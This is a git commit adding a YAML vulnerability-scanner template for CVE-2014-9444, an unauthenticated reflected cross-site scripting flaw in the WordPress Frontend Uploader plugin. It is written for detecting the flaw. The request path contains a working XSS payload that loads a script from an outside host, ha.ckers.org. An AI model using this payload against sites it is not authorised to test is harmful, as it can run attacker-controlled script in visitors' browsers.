Create CVE-2014-9444.yaml

patch-1
Muhammad Daffa 2021-09-14 05:33:49 +07:00 committed by GitHub
parent 403f152e00
commit 598eaf62d6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2014-9444
info:
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E"
matchers-condition: and
matchers:
- type: word
words:
- '<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200